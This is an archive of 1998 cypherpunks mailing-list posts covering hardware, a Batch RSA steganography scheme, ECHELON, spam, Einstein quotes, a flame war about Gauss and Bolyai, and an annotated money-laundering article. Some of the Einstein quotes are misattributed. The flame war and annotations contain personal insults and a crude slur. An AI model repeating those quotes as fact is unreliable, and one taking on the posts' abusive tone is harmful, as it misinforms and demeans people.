Bruce Schneier
ISBN 0-471-11709-9

Disappearing Cryptography
Peter Wayner
ISBN 0-12-738671-8

Internet Cryptography
Richard E. Smith
ISBN 0-201-92480-3

Decrypted Secrets: Methods and Maxims of Cryptology
F.L. Bauer
ISBN 3-540-60418-9


Some sites that that might be of interest:

Austin Cypherpunks

Soda Cypherpunks - Original site





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Sun, 11 Jan 1998 08:18:22 +0800
To: tcmay@got.net
Subject: Re: In God We Antitrust, from the Netly News
In-Reply-To: <v03102800b0dc2d3e93db@[207.167.93.63]>
Message-ID: <199801092140.VAA00255@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Tim May <tcmay@got.net> writes:
> [snip]
> The AMD K6 may not be quite the dog the K5 was, 

I've got a K5, seems like a fine CPU to me... around the performance
of a P166 for about 1/2 the price.

Why do you say the K5 is a dog?

K6 is similarly value for money.

I also bought a AMD 486 120Mhz a while ago for similar value for money
reasons.

I thought for a while Cyrix or AMD had faster processors available
than Intel.  (Just prior to to Pentium II, where the Pentium Pro was
highly priced and for some applications slower than an Pentium clocked
at the same speed).

I may not be off to buy AMD stock, but I like competition, and will
buy AMD or Cyrix any time they have a cheaper and compatible product.

Adam
-- 
Now officially an EAR violation...
Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@REPLAY.COM>
Date: Sat, 10 Jan 1998 05:18:50 +0800
To: cypherpunks@toad.com
Subject: Batch RSA for stego data
Message-ID: <199801092105.WAA15456@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Problem: Suppose there is a source of data which looks like random noise
but which contains embedded messages.  This may be a subliminal channel
in a crypto protocol, steganographically embedded data, or even a simple
message pool where you want to disguise what key each message is for.
How do you scan and identify messages for you?

Solution: Extract bits as appropraite, apply whatever selection rules
are necessary to pull them out of the stego'd data or other source.
Some fraction of what results is messages for you, the remainder is
noise or messages for someone else, which will be indistinguishable.

Method 1: For finding messages sent by someone you have communicated
with previously.  Use shared secret data to flag the message.

Method 1A: each time you send a message, include (in the encrypted
portion) a 64-bit random value which will be used to flag the next
message to them.  Prepend the encrypted message with the 64 bit random
value from the previous message.  Each person keeps a list of the next
random value to be expected from each communicant.  The extracted data
can be easily scanned to see if it matches anything on the list.

Method 1B: use shared secret data and a sequence number to calculate a
hash which will be used to flag the next message sent.  This can be
used to calculate the flag value to be expected for the next message
from each sender, which can be compared against each potential
message.

For both methods 1A and 1B, once the message is recognized a shared
secret key is used to decrypt the remainder of the data past the flag
portion.  The shared secret key can be changed after each message
using similar techniques to changing the flags.  (Safety tip: don't
make the shared secret key the same as the flag value.)


Method 2: For finding messages sent by someone you have never communicated
with previously.

Method 2A: Sender encrypts a low-entropy flag message with receiver's
public key, pads it so it looks like random noise, and puts that at
the start of each message.  Receiver decrypts the beginning of each
message using his private key, looking to see if the results are low
entropy.  When such a message is detected the secret key for
decrypting the remainder of the message can be embedded in the
low-entropy portion.

Method 2B: Like 2A, but use Fiat's "Batch RSA" to decrypt multiple
messages in one batch.  Recipient publishes his public key with
multiple legal exponents (say, the first 16 primes).  Sender encrypts
his low-entropy message choosing one of the encryption exponents at
random.  He checks to see if the low bits of the encryption output
match the index of the encryption exponent (e.g. if the 7th encryption
exponent was chosen then the low order 4 bits should hold the value
7).  He repeatedly encrypts with different random padding until he
finds an encrypted form which properly encodes the exponent.  Receiver
batches messages together such that the low order 4 bits of each
message in the batch are different, and applies the Batch RSA
decryption to try decrypting each message.  As before the receiver
looks to see if the result is low entropy.

For both 2A and 2B it may be possible to do the decryption using only
one of the two RSA primes, if the encrypted data was smaller than that
prime value.  (This idea comes from Shamir.)  Even if not, the Batch
RSA algorithm can be applied separately for the two primes and then
the results combined at the end for each message via the CRT, as is
often done for RSA decryption.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Sat, 10 Jan 1998 11:39:08 +0800
To: cypherpunks@cyberpass.net
Subject: Will the First Puppy go under the ax?
Message-ID: <v03007800b0dc9b47ae74@[168.161.105.216]>
MIME-Version: 1.0
Content-Type: text/plain




                        Q: Mike, before getting to more important issues,
how come you
                        guys aren't neutering Buddy? (Laughter.)

                        MCCURRY: There are a lot of people around here who
have been
                        neutered, but I haven't heard a discussion of Buddy
being
                        neutered. I do not know the answer to that. I will
talk to the First
                        Dog owner and get the answer to that question.

                        Q: You would know if there was going to be an
announcement
                        today, wouldn't you?

                        MCCURRY: I would not go beyond what I just said -- the
                        Treasury Department is the place to go.

                        Q: On the neutering? (Laughter.)

                        MCCURRY: Not on neutering. Can you spay or neuter a
puppy?

                        Q: Six months.

                        MCCURRY: Any dog owners out there that can help us?

                        Q: Mike, neutering is usually six months --

                        MCCURRY: That's what I thought. It's got to be a
little bit older.

                        Q: I heard that you were planning not to neuter him.

                        MCCURRY: I wasn't planning to do anything with him.
                        (Laughter.) Other than sucking up to the president
by scratching
                        little Buddy's belly from time to time. (Laughter.)

                        Q: It will, however, be at risk. (Laughter.)

                        MCCURRY: I'll find out on that. And I know your
insatiable
                        appetite for dog trivia -- I will see if I can find
out about that.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <anon@anon.efga.org>
Date: Sat, 10 Jan 1998 11:40:30 +0800
To: cypherpunks@Algebra.COM
Subject: Spies like US
Message-ID: <ac318eb80b34b2467664eb7451a22534@anon.efga.org>
MIME-Version: 1.0
Content-Type: text/plain



http://www.telegraph.co.uk:80/et?ac=000602131144806&rtmo=0sKsx2bq&atmo
0sKsx2bq&pg=/et/97/12/16/ecspy16..html
       
   A European Commission report warns that the United States has
   developed an extensive network spying on European citizens and we
   should all be worried. Simon Davies reports
   
   [INLINE] Cooking up a charter for snooping
   
                              Spies everywhere
                                      
   A GLOBAL electronic spy network that can eavesdrop on every telephone,
   email and telex communication around the world will be officially
   acknowledged for the first time in a European Commission report to be
   delivered this week.
   
   The report - Assessing the Technologies of Political Control - was
   commissioned last year by the Civil Liberties Committee of the
   European Parliament. It contains details of a network of
   American-controlled intelligence stations on British soil and around
   the world, that "routinely and indiscriminately" monitor countless
   phone, fax and email messages.
   
   It states: "Within Europe all email telephone and fax communications
   are routinely intercepted by the United States National Security
   Agency transfering all target information from the European mainland
   via the strategic hub of London then by satellite to Fort Meade in
   Maryland via the crucial hub at Menwith Hill in the North York moors
   in the UK."
   
   The report confirms for the first time the existence of the secretive
   ECHELON system.
   
   Until now, evidence of such astounding technology has been patchy and
   anecdotal. But the report - to be discussed on Thursday by the
   committee of the office of Science and Technology Assessment in
   Luxembourg - confirms that the citizens of Britain and other European
   states are subject to an intensity of surveillance far in excess of
   that imagined by most parliaments. Its findings are certain to excite
   the concern of MEPs.
   
   "The ECHELON system forms part of the UKUSA system (see 'Cooking up a
   charter for snooping') but unlike many of the electronic spy systems
   developed during the Cold War, ECHELON is designed primarily for
   non-military targets: governments, organizations and businesses in
   virtually every country.
   
   "The ECHELON system works by indiscriminately intercepting very large
   quantities of communications and then siphoning out what is valuable
   using artificial intelligence aids like MEMEX to find key words".
   
   According to the report, ECHELON uses a number of national
   dictionaries containing key words of interest to each country.
   
   For more than a decade, former agents of US, British, Canadian and New
   Zealand national security agencies have claimed that the monitoring of
   electronic communications has become endemic throughout the world.
   Rumours have circulated that new technologies have been developed
   which have the capability to search most of the world's telex, fax and
   email networks for "key words". Phone calls, they claim, can be
   automatically analysed for key words.
   
   Former signals intelligence operatives have claimed that spy bases
   controlled by America have the ability to search nearly all data
   communications for key words. They claim that ECHELON automatically
   analyses most email messaging for "precursor" data which assists
   intelligence agencies to determine targets. According to former
   Canadian Security Establishment agent Mike Frost, a voice recognition
   system called Oratory has been used for some years to intercept
   diplomatic calls.
   
   The driving force behind the report is Glyn Ford, Labour MEP for
   Greater Manchester East. He believes that the report is crucial to the
   future of civil liberties in Europe.
   
   "In the civil liberties committee we spend a great deal of time
   debating issues such as free movement, immigration and drugs.
   Technology always sits at the centre of these discussions. There are
   times in history when technology helps democratise, and times when it
   helps centralise. This is a time of centralisation. The justice and
   home affairs pillar of Europe has become more powerful without a
   corresponding strengthening of civil liberties."
   
   The report recommends a variety of measures for dealing with the
   increasing power of the technologies of surveillance being used at
   Menwith Hill and other centres. It bluntly advises: "The European
   Parliament should reject proposals from the United States for making
   private messages via the global communications network (Internet)
   accessible to US intelligence agencies."
   
   The report also urges a fundamental review of the involvement of the
   American NSA (National Security Agency) in Europe, suggesting that
   their activities be either scaled down, or become more open and
   accountable.
   
   Such concerns have been privately expressed by governments and MEPs
   since the Cold War, but surveillance has continued to expand. US
   intelligence activity in Britain has enjoyed a steady growth
   throughout the past two decades. The principal motivation for this
   rush of development is the US interest in commercial espionage. In the
   Fifties, during the development of the "special relationship" between
   America and Britain, one US institution was singled out for special
   attention.
   
   The NSA, the world's biggest and most powerful signals intelligence
   organisation, received approval to set up a network of spy stations
   throughout Britain. Their role was to provide military, diplomatic and
   economic intelligence by intercepting communications from throughout
   the Northern Hemisphere.
   
   The NSA is one of the shadowiest of the US intelligence agencies.
   Until a few years ago, it existence was a secret and its charter and
   any mention of its duties are still classified. However, it does have
   a Web site (www.nsa.gov:8080) in which it describes itself as being
   responsible for the signals intelligence and communications security
   activities of the US government.
   
   One of its bases, Menwith Hill, was to become the biggest spy station
   in the world. Its ears - known as radomes - are capable of listening
   in to vast chunks of the communications spectrum throughout Europe and
   the old Soviet Union.
   
   In its first decade the base sucked data from cables and microwave
   links running through a nearby Post Office tower, but the
   communications revolutions of the Seventies and Eighties gave the base
   a capability that even its architects could scarcely have been able to
   imagine. With the creation of Intelsat and digital telecommunications,
   Menwith and other stations developed the capability to eavesdrop on an
   extensive scale on fax, telex and voice messages. Then, with the
   development of the Internet, electronic mail and electronic commerce,
   the listening posts were able to increase their monitoring capability
   to eavesdrop on an unprecedented spectrum of personal and business
   communications.
   
   This activity has been all but ignored by the UK Parliament. When
   Labour MPs raised questions about the activities of the NSA, the
   Government invoked secrecy rules. It has been the same for 40 years.
   
   Glyn Ford hopes that his report may be the first step in a long road
   to more openness. "Some democratically elected body should surely have
   a right to know at some level. At the moment that's nowhere".
   
     See also in this week's issue: Pretty good Phil bounces back (a
   report on the consolidation of the reputation of Phil Zimmermann,
   creator of PGP).
   
   14 October 1997: Europe's private parts to expand
   





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m2cresumes@earthlink.net
Date: Sat, 10 Jan 1998 15:09:33 +0800
To: cypherpunks@toad.com
Subject: Access Over 1 MILLION Resumes!
Message-ID: <1>
MIME-Version: 1.0
Content-Type: text/plain



NOT a job site, NOT a search engine, NOT a career board, NOT a newsgroup
AND we do NOT limit you to a single database!

U S Resume is a true technological leap.  It allows subscribers access the OVER 1 MILLION resumes on the ENTIRE INTERNET (source:  Electronic Recruiting Index, Dec. 1996).  It finds your candidates and also downloads their resumes to your hard drive all automatically, so you can browse them later with NO Internet wait time.  You gain access to the same "virtual robotics" technology used by our Fortune 500 clients, enabling you to spend less time looking for qualified candidates and more time placing them.

Prices start as low as $295 per month, no more than an ordinary job board and less than just one typical help wanted display ad.

Why not have the ENTIRE INTERNET as your own PERSONAL DATABASE?

For additional information please visit us at http://www.usresume.com

If the site doesn't answer all your questions, please don't hesitate to call Dave Weltman or Jeff Eisenberg at 914-627-2600.

Thanks!

P.S If you would like to be added to our DO NOT EMAIL LIST, please reply to this message with the word REMOVE in the Subject of your reply.  When our Robot finds the word REMOVE in the Subject of any message, it will automatically add the senders email address to our DO NOT EMAIL LIST.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sat, 10 Jan 1998 13:07:53 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Einstein quotes
Message-ID: <199801100530.XAA12109@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



I thought I'd share these quote...

The one quote that I found really funny is the one where Einstein says that
had he known he would have been a locksmith. At some point after he came to
the US somebody asked him what he would have been if he hadn't taken up
physics. His reply was a plumber. He was promptly made an honorary member of
the national plumbers union.

Forwarded message:

> X-within-URL: http://www.humboldt1.com/~gralsto/einstein/quotes.html
> 
>                             ALBERT EINSTEIN QUOTES
>                                        
>      _________________________________________________________________
>    
>    
>    
>    "It is best, it seems to me, to separate one's inner striving from
>    one's trade as far as possible. It is not good when one's daily break
>    is tied to God's special blessing." -- Albert Einstein
>      _________________________________________________________________
>    
>    
>    
>    "It may affront the military-minded person to suggest a reqime that
>    does not maintain any military secrets." -- Albert Einstein
>    
>    
>      _________________________________________________________________
>    
>    
>    
>    "It would be possible to describe everything scientifically, but it
>    would make no sense; it would be without meaning, as if you described
>    a Beethoven symphony as a variation of wave pressure." -- Albert
>    Einstein
>    
>    
>      _________________________________________________________________
>    
>    
>    
>    "So long as they don't get violent, I want to let everyone say what
>    they wish, for I myself have always said exactly what pleased me." --
>    Albert Einstein
>    
>    
>      _________________________________________________________________
>    
>    "Teaching should be such that what is offered is perceived as a
>    valuable gift and not as a hard duty." -- Albert Einstein
>    
>    
>      _________________________________________________________________
>    
>    
>    
>    "Gravity cannot be held responsible for people falling in love." --
>    Albert Einstein
>    
>    Thanks to Rick Burress <rburress@home.com>
>    
>    
>      _________________________________________________________________
>    
>    
>    
>    "When you sit with a nice girl for two hours, it seems like two
>    minutes. When you sit on a hot stove for two minutes, it seems like
>    two hours that's relativity." -- Albert Einstein
>    
>    Thanks to Glen E Kelly <kelly@jetlink.net>
>      _________________________________________________________________
>    
>    
>    
>    "He who joyfully marches to music in rank and file has already earned
>    my contempt. He has been given a large brain by mistake, scince for
>    him the spinal cord would fully suffice. This disgrace to civilization
>    should be done away with at once. Heroism at command, senseless
>    brutality, deplorable love-of-country stance, how violently I hate all
>    this, how despiceable an ignoreable war is; I would rather be torn to
>    shreds than be a part of so base an action! It is my conviction that
>    killing under the cloak of war is nothing but an act of murder." --
>    Albert Einstein
>    Thanks to Alexander Elsing <else@neuss.netsurf.de>
>    
>    
>      _________________________________________________________________
>    
>    
>    
>    "As far as the laws of mathematics refer to reality, they are not
>    certain; as far as they are certain, they do not refer to
>    reality."--Albert Einstein
>    
>    
>      _________________________________________________________________
>    
>    
>    
>    Imagination is more important than knowledge. -- Albert Einstein
>    
>    
>      _________________________________________________________________
>    
>    
>    
>    Sometimes one pays most for the things one gets for nothing. -- Albert
>    Einstein
>    
>    
>      _________________________________________________________________
>    
>    
>    
>    "If we knew what it was we were doing, it would not be called
>    research, would it?"
>    - Albert Einstein
>    
>    
>      _________________________________________________________________
>    
>    
>    
>    "Common sense is the collection of prejudices acquired by age
>    eighteen."
>    - Albert Einstein
>    
>    
>      _________________________________________________________________
>    
>    
>    
>    Albert Einstein, when asked to describe radio, replied:
>    "You see, wire telegraph is a kind of a very, very long cat. You pull
>    his tail in New York and his head is meowing in Los Angeles. Do you
>    understand this? And radio operates exactly the same way: you send
>    signals here, they receive them there. The only difference is that
>    there is no cat."
>    
>    
>      _________________________________________________________________
>    
>    
>    
>    God doesn't play dice.
>    -- Albert Einstein
>    
>    
>      _________________________________________________________________
>    
>    
>    
>    God may be subtle, but He isn't plain mean. -- Albert Einstein
>    
>    
>      _________________________________________________________________
>    
>    
>    
>    "I know not with what weapons World War III will be fought, but World
>    War IV will be fought with sticks and stones." -- Albert Einstein
>    
>    
>      _________________________________________________________________
>    
>    
>    
>    If A equals success, then the formula is _ A = _ X + _ Y + _ Z. _ X is
>    work. _ Y is play. _ Z is keep your mouth shut. -- Albert Einstein
>    
>    
>      _________________________________________________________________
>    
>    
>    
>    "If I had only known, I would have been a locksmith."
>    -- Albert Einstein
>    
>    
>      _________________________________________________________________
>    
>    
>    
>    Man usually avoids attributing cleverness to somebody else
>    -- unless it is an enemy.
>    
>    -- Albert Einstein
>    
>    
>      _________________________________________________________________
>    
>    
>    
>    The hardest thing in the world to understand is the income tax. --
>    Albert Einstein
>    
>    
>      _________________________________________________________________
>    
>    
>    
>    "The secret to creativity is knowing how to hide your sources."
>    --Albert Einstein
>    
>    
>      _________________________________________________________________
>    
>    
>    
>    "If the facts don't fit the theory, change the facts." --Albert
>    Einstein
>    
>    
>      _________________________________________________________________
>    
>    
>    
>    "I never think of the future. It comes soon enough." --Albert Einstein
>    
>    
>    
>      _________________________________________________________________
>    
>    
>    
>    "Only two things are infinite, the universe and human stupidity, and
>    I'm not sure about the former." --Albert Einstein
>    
>    
>      _________________________________________________________________
>    
>    
>    
>    "Before God we are all equally wise - and equally foolish." --Albert
>    Einstein (1879-1955)
>    
>    
>      _________________________________________________________________
>    
>    
>    
>    "The most incomprehensible thing about the world is that it is at all
>    comprehensible." --Albert Einstein (1879-1955)
>    
>    
>      _________________________________________________________________
>    
>    
>    
>    "The release of atomic energy has not created a new problem. It has
>    merely made more urgent the necessity of solving an existing one."
>    --Albert Einstein (1879-1955)
>    
>    
>      _________________________________________________________________
>    
>    
>    
>    "You cannot simultaneously prevent and prepare for war." --Albert
>    Einstein (1879-1955)
>    
>    
>      _________________________________________________________________
>    
>    
>    
>    "There are only two ways to live your life. One is as though nothing
>    is a miracle. The other is as though everything is a miracle." --A.
>    Einstein
>    
>    
>      _________________________________________________________________
>    
>    
>    
>    "Great spirits have always found violent opposition from mediocrities.
>    The latter cannot understand it when a man does not thoughtlessly
>    submit to hereditary prejudices but honestly and courageously uses his
>    intelligence." --Einstein, Albert
>    
>    
>      _________________________________________________________________
>    
>    
>    
>    "A man's ethical behavior should be based effectually on sympathy,
>    education, and social ties; no religious basis is necessary. Man would
>    indeeded be in a poor way if he had to be restrained by fear of
>    punishment and hope of reward after death." --Einstein, Albert
>    
>    
>      _________________________________________________________________
>    
>    
>    
>    "What really interests me is whether God had any choice in the
>    creation of the world." --Albert Einstein
>    
>    
>      _________________________________________________________________
>    
>    
>    
>    "If one studies too zealously, one easily loses his pants." --Albert
>    Einstein
>    
>    
>      _________________________________________________________________
>    
>    
>    
>    Through the release of atomic energy, our generation has brought into
>    the world the most revolutionary force since prehistoric man's
>    discovery of fire. This basic force of the universe cannot be fitted
>    into the outmoded concept of narrow nationalisms.
>    For there is no secret and there is no defense; there is no
>    possibility of control except through the aroused understanding and
>    insistence of the peoples of the world. We scientists recognise our
>    inescapable responsibility to carry to our fellow citizens an
>    understanding of atomic energy and its implication for society. In
>    this lies our only security and our only hope - we believe that an
>    informed citizenry will act for life and not for death.
>    A. Einstein, 1947 d.C.
>    
>    
>      _________________________________________________________________
>    
>    
>    
>    If you are out to describe the truth, leave elegance to the tailor.
>    
>    
>      _________________________________________________________________
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 10 Jan 1998 14:58:44 +0800
To: cypherpunks@toad.com
Subject: Re: rant on the morality of confidentiality (fwd)
In-Reply-To: <199801100237.UAA11439@einstein.ssz.com>
Message-ID: <5BT3ie33w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate <ravage@ssz.com> writes:

>
> Ok, my absolutely last post on this issue.

(Pointing to the horse) "He's dead, Jim."

> > > Anyone who would tell their dying wife, via their son, to wait a moment
> > > until he had finished his calculations is not a nice person.
> >
> > Do you have proof that Gauss did that?  This sounds like another one of
> > those urban legends the envious sheeple like to invent about celebrities,
> > like the claim that Leonrado da Vinci was a cocksucker.
>
> It is a commen citation in several of his biographies. The first place I saw
> it was in a science history book that Isaac Asimov wrote (you know who he is
> I assume,

You're getting desperate, Jim, and resorting to cheap personal shots again.

Yes, I know who Isaac Asimov was.  In fact, I met him in person. He made many
little mistakes in his "popular science" writings. I don't consider him to be
a credible source as far as personal gossip about dead science personnages is
concerned.

Any other citations for your bizarre accusation?

> > > > argument you can make is to cite Bolyai's claims that Lobachevsky was n
> > > > a real person but a "tentacle" of Gauss, created to persecute Bolyai
> > > > (gee, that sounds vaguely familiar...), and you can't find any more dir
> > > > on Gauss, then it proves to me that he was indeed a remarkably nice per
> > >
> > > What the hell are you talking about here? I made no such claims at all.
> >
> > You're citing janos Bolyai, who claimed exactly that.  Unfortunately, the
> > poor chap went insane.
>
> No, I am citing the translator of Bolyai's book; Dr. George Bruce Halsted.
> If you want to discuss this further and intelligently it might do you well to
> have actualy read the book, which by your own admission you never have.
> Don't be a miser, spend the $6.00 US.

It's not the money, it's my time.  I am indeed being miserly with my time, Jim.
Sorry, I don't think it's worth my time to read the rants of an insane person
claiming that Lobachevsky was not a real person, but a "tentacle" of Gauss.
We get more than enough of those on the cypherpunks list, from Timmy May &co.

> I *might* take your comments a hell of a lot more seriously if just once you
> would cite a single reference to *any* of your comments or claims. It is
> interesting that when it comes down to proof you don't have the time to do
> the research nor do you *ever* fill any request for references.

You're lying, Jim.  For example, you've asked me for a reference to the
national origins act, which barred inter alia Japanese-born immigrants from
1924 to 195x; something you should have been able to verify for yourself.
I gave you a reference to a Russian book on US history, knowing that being
an ignorant American you can only read English. If you like, I can cite
a number of Russian books on history of math as well, which won't do you
any good.

> Your twisting words and dangerously approaching straight out lying.

And I've just caught you straight out lying.

> Farkas Bolyai and Gauss worked together on non-euclidian geometry. Let me
> quote the translators notes for the book:
>
> " But to prove Euclid's system, we must show that a triangle's angle-sum is
> exactly a straight angle, which nothing human can ever do.
>   However, this is anticipating, for in 1799 it seems that the mind of the
> elder Bolyai, Bolyai Farkas, was in precisely the same state as that of his
> friend Gauss. Both were intensely trying to prove what now we know is
> indemonstable. ..."

Probably hundreds of mathematicians since Euclid's times have tried and failed
to prove the 6th axiom as a theorem that follows from the other axioms. Farkas
may have been one of the hundreds of people who wasted time trying to prove
a false statement during two millenia.

Gauss, Lobachevsky, and Janos Bolyai (the son) all proved that this axiom
is independent of the others and pondered what kind of geometry would
arise if it were omitted.

Do you understand the difference? Do you have any evidence that Farkas's
waste of time in 1799 contributed to either Gauss's or Janos Bolyai's
impressive results 20+ years later?

> As to my making mistakes, big fucking deal. Everyone does. The difference
> between you and me is that I am not trying to do anything other than figure
> out what happened and why. If I'm wrong I'll admit it (and I am at least
> once a day). I am also willing to do the research (as best I can with what
> resources I have) and also willing to cite it. All I ask from those who wish
> to debate issues with me is equal treatment, in short the opportunity to

You should cut down on personal attacks and flaming.

> review their sources and an honest opportunity to refute those sources. You
> seem to have a personal motive in everything you submit and further *never*
> cite any sort of source that can be reviewed and repudiated or supported.

Again, you're lying.  Have you tried to refute the national origins act?

My sources are Russian books on the history of math.  Since you can't read
Russian, there's no point for me to site them for you.

> To put it bluntly, you lack honesty in your dealings with others.

Jim, why do you insist on turning any discussion into a barrage of personal
attacks, cheap shots, and outright lies?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Sun, 11 Jan 1998 06:33:02 +0800
To: Crisavec <dbrown@alaska.net>
Subject: Re: cypherpunks and guns
In-Reply-To: <3.0.5.32.19980109002532.0084c330@alaska.net>
Message-ID: <Pine.BSF.3.91.980110031733.1597C-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain



> >
> >The fact that they collect a paycheck from the government is prima facie
> >evidence of diminished mental capacity.
> 
> Don't bet on....
> 
> 
> There is only one war, and it's not between the whites and the
> blacks, Labour and the Conservatives, Democrats and Republicans, or
> the Federation and the Romulans, it's between those of us who aren't
> complete idiots and those of us who are.
> 
> 
Who's side are you on?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Anderson <ryan@michonline.com>
Date: Sat, 10 Jan 1998 20:08:41 +0800
To: cypherpunks@Algebra.COM
Subject: This may be of interest...
Message-ID: <Pine.GSO.3.95.980110065831.7152H-100000@king>
MIME-Version: 1.0
Content-Type: text/plain




http://www.law.emory.edu/ELJ/volumes/sum96/lessig.html

If it doesn't hit you immediately, let me help.  The lawyer who wrote this
is the "Special Master" in the DOJ vs. MS case.

It's an interesting paper, and should shed some interesting light on his
viewpoint in the MS case.  Enjoy!


Ryan Anderson - Alpha Geek
PGP fp: 7E 8E C6 54 96 AC D9 57  E4 F8 AE 9C 10 7E 78 C9
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ching Yen Choon" <ycching@unitele.com.my>
Date: Sat, 10 Jan 1998 09:08:21 +0800
To: <cypherpunks@toad.com>
Subject: Cracking a program
Message-ID: <199801100849.IAA17818@acs.unitele.com.my>
MIME-Version: 1.0
Content-Type: text/plain



Let's say I have this encryption program and I don't know what's the
algorithm used in it. Is there a technique I can analyse and break it? Are
there any books or sites which teaches us how to do it?

Any help is much appreciated
Thank you.

YeN ChOoN





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 10 Jan 1998 16:51:08 +0800
To: cypherpunks@Algebra.COM
Subject: Surprise - Anonymous Journalist Opposes Laundering [1/4]
Message-ID: <199801100844.JAA10497@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



The following series of posts is extracted 
from E-Communist. In this article the writer (but a mere cog in the 
Anonymous Entity known as GovernMedia NLC), exhibits the guVermin 
cheerleading so pervasive among those in his/her profession.

In keeping with the spirit of anonymous advocacy favoring global fiscal 
tyranny, "our" collectivistic comments are in brackets as indicated: [S'n'S]

Originally assigned the staid title 'Money Laundering', "we" have taken the
indecent liberty of naming each post separately:

	Part 1 "Know Your Journalist" [1/4]

				[1/4]
...
countries set up the Financial Action Task Force (FATF) [not to be confused
with the BATF] in 1989. Based at the OECD [worthle$$ bureaucracy #2] in 
Paris, this now has 26 member countries, which are supposed to abide by
its 40 recommendations. Among other things, these encourage mutual 
assistance in laundering cases. International co-operation is also being 
fostered by financial-intelligence units [FiUs], some of which recently set 
up a special computer network to swap information about laundering cases.

A statistical black hole

What effect has all this had? It is hard to tell for sure, but such evidence
as looks reliable is hardly encouraging [discouraging]. A report published 
in 1995 by AUSTRAC, [worthle$$ bureaucracy #3] Australia's 
financial-intelligence unit, concluded that between A$1 billion and A$4.5
billion ($740m-3.3 billion) was washed through Australia each year. The
report noted that if this figure is accurate, then Australian poLice were
recouping [recouping?, proceeds of voluntary exchanges are considered stolen
when in fact those doing the "recouping" are the criminals] barely 1% of all
the ["]dirty["] money that they [_]guess[_] is flowing into [but not flowing
out of? It must be all those "dirty" foreigners corrupting the innocent 
Aussie drug addicts and tax evaders] the country--a surprisingly low figure
given that Australia is widely acknowledged to have one of the most 
comprehensive anti-laundering regimes in the world.

[so AUSTRAC thugs are basing their conclusions on guesstimates, which, if
as accurate as they kinda sorta think they might be indicates:

Minions of the Australian FIU stole, that is, recouped, some 10-45mil AUD 
in cash and an unspecified amount of other property, but this is "barely 1%"
of the _potential_ bounty to be had in the lucrative worldwide industry of
asset forfeiture.

Allow me to "guesstimate" a couple of other conclusions they may have made:

1) AUSTRAC lacks sufficient funding (AUSTRAC clerks still lack vacation 
	slush funds).
2) AUSTRAC lacks sufficient personnel (AUSTRAC entry teams are still without
	APCs and close air support).]

When it comes to prosecutions of money launderers, few countries keep 
reliable statistics, often because laundering was only recently deemed a 
separate ["]crime["]. One that does is the Netherlands. According to its
justice ministry, in 1995 some 16,125 [subjectively] ["]suspect["] 
transactions were reported to the country's financial-intelligence [looting]
unit. Only 14% of these were sufficiently dubious [read: juicy confiscatable
assets of sufficient size coming to their attention due to amateurish
operations that lacked political protection which made these "suspect" 
assets worth the time and effort to grab] to pass to the poLice, and only 
0.5% of the original total led to prosecutions. [no mention of the % of 
cases that led to confiscations] Anecdotal evidence suggests a similar 
lack-of-["]success["] elsewhere.

Why aren't more laundrymen being caught? [what about laundrywomen, the 
sexist pigs!] The answer, say those leading the fight against dirty [free]
money, is that most anti-laundering regimes are still in their infancy. [yet
to grow into the horrid monsters of their wet dreams] But, they say, at 
least the situation is improving. [deteriorating] Stanley Morris, FINCEN's
[worthle$$ named bureaucracy #4] director [thug], says undercover operations
in America show that launderers' fees have risen from around 6% of the money
washed in the early 1980s, to 25-28% today. The explanation is that 
laundering is getting harder and riskier--and hence more expensive. Some 
experts also claim that a recent increase in the ["]smuggling["] of cash 
across borders is a sign that [gasp] more ["]criminal["] ["]loot["] is 
shunning banks. [meaning people are fed up with American banks, 
American regulators and America in general: "sell off, cash in and drop out".]

There has also been some progress internationally. A few well-known haunts
of launderers, such as Switzerland and the Cayman Islands, have made it 
easier for bankers to report ["]suspect["] transactions [reclaiming lost 
virginity] without breaking bank-secrecy laws, and for their financial 
gumshoes to co-operate with foreign ones. [meaning they already have so much
money on deposit that it won't effect profits significantly, besides which, 
the typical lazy African dictators' first choice remains CH and those who
are concerned about such matters have long since moved to greener pastures
anyway...] In February, Antigua, another Caribbean haven, closed five out of
six Russian offshore banks because of concerns that they had been laundering
money for Russia's mafia. [no security through obscurity there] The FATF has
also cracked down. [pun intended?] Last year, for the first time, it 
publicly upbraided one of its members, Turkey, for not introducing an 
